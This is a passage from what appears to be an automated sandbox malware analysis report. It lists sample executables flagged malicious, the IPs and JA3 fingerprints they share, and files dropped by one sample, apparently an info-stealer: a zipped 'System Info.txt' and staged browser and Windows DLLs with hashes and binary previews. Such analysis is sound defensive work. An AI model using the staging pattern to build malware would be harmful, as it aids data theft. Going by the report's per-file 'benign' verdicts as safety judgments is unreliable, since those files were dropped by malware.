                                                          rbQe356Ces.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          kzSWxYLY4H.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          nrR5LZJupm.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          Neue Bestellung 09001.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          DeKxL6OdiV.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          OTKqvzSZfm.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          u8NGCuPdOR.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          e5jVcbuCo5.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          i7qUJCnMz0.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          729f05959f10226a50f13f2cdf5eb8d6d0761fc8a332d.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          iQjdq8GOib.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          aRJ7tjHVOF.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          4o99bctKos.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          zsChlwJrkj.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          gDvlEg3e8p.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          oz7Sa3qccH.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          1k7pDZj7AD.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          ZH2O3APZNp.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          ce5f3254611a8c095a3d821d44539877pAWNholT8X.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          OARirszNK2.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          Neue Bestellung 09001.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          u8NGCuPdOR.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          tNOprA6TKc.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          gow3TOp9TW.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          TDxZ3sbsqi.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          729f05959f10226a50f13f2cdf5eb8d6d0761fc8a332d.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          iQjdq8GOib.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          aRJ7tjHVOF.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          4o99bctKos.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          gDvlEg3e8p.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          oz7Sa3qccH.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          1k7pDZj7AD.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          ZH2O3APZNp.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          ECzur31Emx.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          QtTTdCez49.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          gpkL80W2ac.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          22AVgXwGEK.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          22AVgXwGEK.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dllOARirszNK2.exeGet hashmaliciousBrowse
                                                            rbQe356Ces.exeGet hashmaliciousBrowse
                                                              Neue Bestellung 09001.exeGet hashmaliciousBrowse
                                                                OTKqvzSZfm.exeGet hashmaliciousBrowse
                                                                  u8NGCuPdOR.exeGet hashmaliciousBrowse
                                                                    e5jVcbuCo5.exeGet hashmaliciousBrowse
                                                                      729f05959f10226a50f13f2cdf5eb8d6d0761fc8a332d.exeGet hashmaliciousBrowse
                                                                        iQjdq8GOib.exeGet hashmaliciousBrowse
                                                                          aRJ7tjHVOF.exeGet hashmaliciousBrowse
                                                                            4o99bctKos.exeGet hashmaliciousBrowse
                                                                              gDvlEg3e8p.exeGet hashmaliciousBrowse
                                                                                oz7Sa3qccH.exeGet hashmaliciousBrowse
                                                                                  1k7pDZj7AD.exeGet hashmaliciousBrowse
                                                                                    ZH2O3APZNp.exeGet hashmaliciousBrowse
                                                                                      ECzur31Emx.exeGet hashmaliciousBrowse
                                                                                        QtTTdCez49.exeGet hashmaliciousBrowse
                                                                                          NqnaRapjVU.exeGet hashmaliciousBrowse
                                                                                            9uHCz7MrjF.exeGet hashmaliciousBrowse
                                                                                              SecuriteInfo.com.Packed-GDTFD6717704122.28206.exeGet hashmaliciousBrowse
                                                                                                vSHMPhFi15.exeGet hashmaliciousBrowse

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\LocalLow\UzHzOcbkHjz.zip
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:Zip archive data, at least v2.0 to extract
                                                                                                  Category:dropped
                                                                                                  Size (bytes):798
                                                                                                  Entropy (8bit):7.486252210525808
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:9F/Fnetx8MUPHUGDZf6nbSMOqUmYJ7x7ko:9NVa8RDynbmqUlYo
                                                                                                  MD5:B620879514592B8797EB9744C853362F
                                                                                                  SHA1:1F2A5B54EE2E4FE83DC797D831D1F7017B6B275C
                                                                                                  SHA-256:2A15FE41DEB1429DBCE26453D20AEE75C151DA8428634CB029455D27A4E35931
                                                                                                  SHA-512:5ED38628990811DF8D056F00FF0EA9BF169FDF0743BF2C72DAE831A6ABE659BAEA6408675548B62F0D4021180E085266E63F4CB587009A11007C8BE2B0F8E5E0
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview: PK........ .;S.^.....>.......System Info.txtUT....*Ra.*Ra.*RauS.N.0.}...yL%b...'O...-.....d..Z.v.'.....v.(R&g..g..htuu...$.O............, ..J.....nU.+U...4.,..p.;.\.&._6..FhB...h.2..y.Xw.....S..x2....4..I..I...P$.4.Fg.$...5....1.l...P(....a|......:..I+...k....O..+...]..F.`f.m....&.y.g.......lJ._.k.Sw.....].]..DD.H..(9.cn.}...H..!. H..1.x.wm.....z...Ki....lp,uW.../....0.<.]7N...>v..o.).gU...\..QrlUm.6o`.y 3.9..,.|..k|.7..I...*....V+o......+..p.R8.x./..;....xz.0X....8....X.R.0..u......vU).pD.u.....:...k..c.C.t~.e...s.N..F.%.uVU8*.\V.....>...J.....<...8..Qw....npwF.....YD(......3.....TY...H@.....[>K\....C%.B....J.6.g...5F..G.h....[..i...}e1x..a(B........&....m{..PK.......... .;S.^.....>.....................System Info.txtUT....*RaPK..........F.........
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):123344
                                                                                                  Entropy (8bit):6.504957642040826
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:DkO/6RZFrpiS7ewflNGa35iOrjmwWTYP1KxBxZJByEJMBrsuLeLsWxcdaocACs0K:biRZFdBiussQ1MBjq2aocts03/7FE
                                                                                                  MD5:F92586E9CC1F12223B7EEB1A8CD4323C
                                                                                                  SHA1:F5EB4AB2508F27613F4D85D798FA793BB0BD04B0
                                                                                                  SHA-256:A1A2BB03A7CFCEA8944845A8FC12974482F44B44FD20BE73298FFD630F65D8D0
                                                                                                  SHA-512:5C047AB885A8ACCB604E58C1806C82474DC43E1F997B267F90C68A078CB63EE78A93D1496E6DD4F5A72FDF246F40EF19CE5CA0D0296BBCFCFA964E4921E68A2F
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: OARirszNK2.exe, Detection: malicious, Browse
                                                                                                  • Filename: rbQe356Ces.exe, Detection: malicious, Browse
                                                                                                  • Filename: Neue Bestellung 09001.exe, Detection: malicious, Browse
                                                                                                  • Filename: OTKqvzSZfm.exe, Detection: malicious, Browse
                                                                                                  • Filename: u8NGCuPdOR.exe, Detection: malicious, Browse
                                                                                                  • Filename: e5jVcbuCo5.exe, Detection: malicious, Browse
                                                                                                  • Filename: 729f05959f10226a50f13f2cdf5eb8d6d0761fc8a332d.exe, Detection: malicious, Browse
                                                                                                  • Filename: iQjdq8GOib.exe, Detection: malicious, Browse
                                                                                                  • Filename: aRJ7tjHVOF.exe, Detection: malicious, Browse
                                                                                                  • Filename: 4o99bctKos.exe, Detection: malicious, Browse
                                                                                                  • Filename: gDvlEg3e8p.exe, Detection: malicious, Browse
                                                                                                  • Filename: oz7Sa3qccH.exe, Detection: malicious, Browse
                                                                                                  • Filename: 1k7pDZj7AD.exe, Detection: malicious, Browse
                                                                                                  • Filename: ZH2O3APZNp.exe, Detection: malicious, Browse
                                                                                                  • Filename: ECzur31Emx.exe, Detection: malicious, Browse
                                                                                                  • Filename: QtTTdCez49.exe, Detection: malicious, Browse
                                                                                                  • Filename: NqnaRapjVU.exe, Detection: malicious, Browse
                                                                                                  • Filename: 9uHCz7MrjF.exe, Detection: malicious, Browse
                                                                                                  • Filename: SecuriteInfo.com.Packed-GDTFD6717704122.28206.exe, Detection: malicious, Browse
                                                                                                  • Filename: vSHMPhFi15.exe, Detection: malicious, Browse
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y.Z.............x.......x.......x......=z......=z......=z.......x.......x..........z.../{....../{....../{....../{b...../{......Rich............PE..L...C@.\.........."!.................b.......0......................................~p....@.................................p...........h...........................0...T................... ...........@............0..$............................text...7........................... ..`.orpc........ ...................... ..`.rdata...y...0...z..................@..@.data...............................@....rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):26064
                                                                                                  Entropy (8bit):5.981632010321345
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:KuAjyb0Xc6JzVuLoW2XDOc3TXg1hjsvDG8A3OPLon07zS:BEygs6RV6oW2Xd38njiDG8Mj
                                                                                                  MD5:A7FABF3DCE008915CEE4FFC338FA1CE6
                                                                                                  SHA1:F411FB41181C79FBA0516D5674D07444E98E7C92
                                                                                                  SHA-256:D368EB240106F87188C4F2AE30DB793A2D250D9344F0E0267D4F6A58E68152AD
                                                                                                  SHA-512:3D2935D02D1A2756AAD7060C47DC7CABBA820CC9977957605CE9BBB44222289CBC451AD331F408317CF01A1A4D3CF8D9CFC666C4E6B4DB9DDD404C7629CEAA70
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S......U...U...U...U...U..T...U..T...U..T...U..T...U5.T...U...U!..U..T...U..T...U...U...U..T...URich...U........PE..L...<@.\.........."!.........8......0........0.......................................7....@..........................=......0>..x....`...............H..........<...09..T............................9..@............0...............................text...f........................... ..`.orpc........ ...................... ..`.rdata.......0......................@..@.data...@....P.......(..............@....rsrc........`.......*..............@..@.reloc..<............D..............@..B........................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):70608
                                                                                                  Entropy (8bit):5.389701090881864
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:3n8PHF564hn4wva3AVqH5PmE0SjA6QM0avrDG8MR43:38th4wvaQVE5PRl0xs
                                                                                                  MD5:5243F66EF4595D9D8902069EED8777E2
                                                                                                  SHA1:1FB7F82CD5F1376C5378CD88F853727AB1CC439E
                                                                                                  SHA-256:621F38BD19F62C9CE6826D492ECDF710C00BBDCF1FB4E4815883F29F1431DFDA
                                                                                                  SHA-512:A6AB96D73E326C7EEF75560907571AE9CAA70BA9614EB56284B863503AF53C78B991B809C0C8BAE3BCE99142018F59D42DD4BCD41376D0A30D9932BCFCAEE57A
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~.....K...K...K.g.K...K4}.J...K4}.J...K4}.J...K4}.J...K...J...K...J...K...K...K&|.J...K&|.J...K&|uK...K&|.J...KRich...K........PE..L...J@.\.........."!.................$.......0...............................0............@.........................0z.......z...........v................... .......u..T...........................Hv..@............0...............................orpc...t........................... ..`.text........ ...................... ..`.rdata...Q...0...R..................@..@.data................j..............@....rsrc....v.......x...t..............@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19920
                                                                                                  Entropy (8bit):6.2121285323374185
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
                                                                                                  MD5:7CD244C3FC13C90487127B8D82F0B264
                                                                                                  SHA1:09E1AD17F1BB3D20BD8C1F62A10569F19E838834
                                                                                                  SHA-256:BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
                                                                                                  SHA-512:C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19920
                                                                                                  Entropy (8bit):6.2121285323374185
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
                                                                                                  MD5:7CD244C3FC13C90487127B8D82F0B264
                                                                                                  SHA1:09E1AD17F1BB3D20BD8C1F62A10569F19E838834
                                                                                                  SHA-256:BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
                                                                                                  SHA-512:C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.112057846012794
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                                                                                                  MD5:E2F648AE40D234A3892E1455B4DBBE05
                                                                                                  SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                                                                                                  SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                                                                                                  SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.166618249693435
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                                                                                                  MD5:E479444BDD4AE4577FD32314A68F5D28
                                                                                                  SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                                                                                                  SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                                                                                                  SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..|........8...T...T.......4..|........d...............4..|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.1117101479630005
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                                                                                                  MD5:6DB54065B33861967B491DD1C8FD8595
                                                                                                  SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                                                                                                  SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                                                                                                  SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.174986589968396
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                                                                                                  MD5:2EA3901D7B50BF6071EC8732371B821C
                                                                                                  SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                                                                                                  SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                                                                                                  SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17856
                                                                                                  Entropy (8bit):7.076803035880586
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                                                                                                  MD5:D97A1CB141C6806F0101A5ED2673A63D
                                                                                                  SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                                                                                                  SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                                                                                                  SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.131154779640255
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                                                                                                  MD5:D0873E21721D04E20B6FFB038ACCF2F1
                                                                                                  SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                                                                                                  SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                                                                                                  SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u*l...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....u*l........A...T...T........u*l........d................u*l....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............u*l....................(...p...........R...}...............*...Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20792
                                                                                                  Entropy (8bit):7.089032314841867
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                                                                                                  MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                                                                                                  SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                                                                                                  SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                                                                                                  SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.101895292899441
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                                                                                                  MD5:D500D9E24F33933956DF0E26F087FD91
                                                                                                  SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                                                                                                  SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
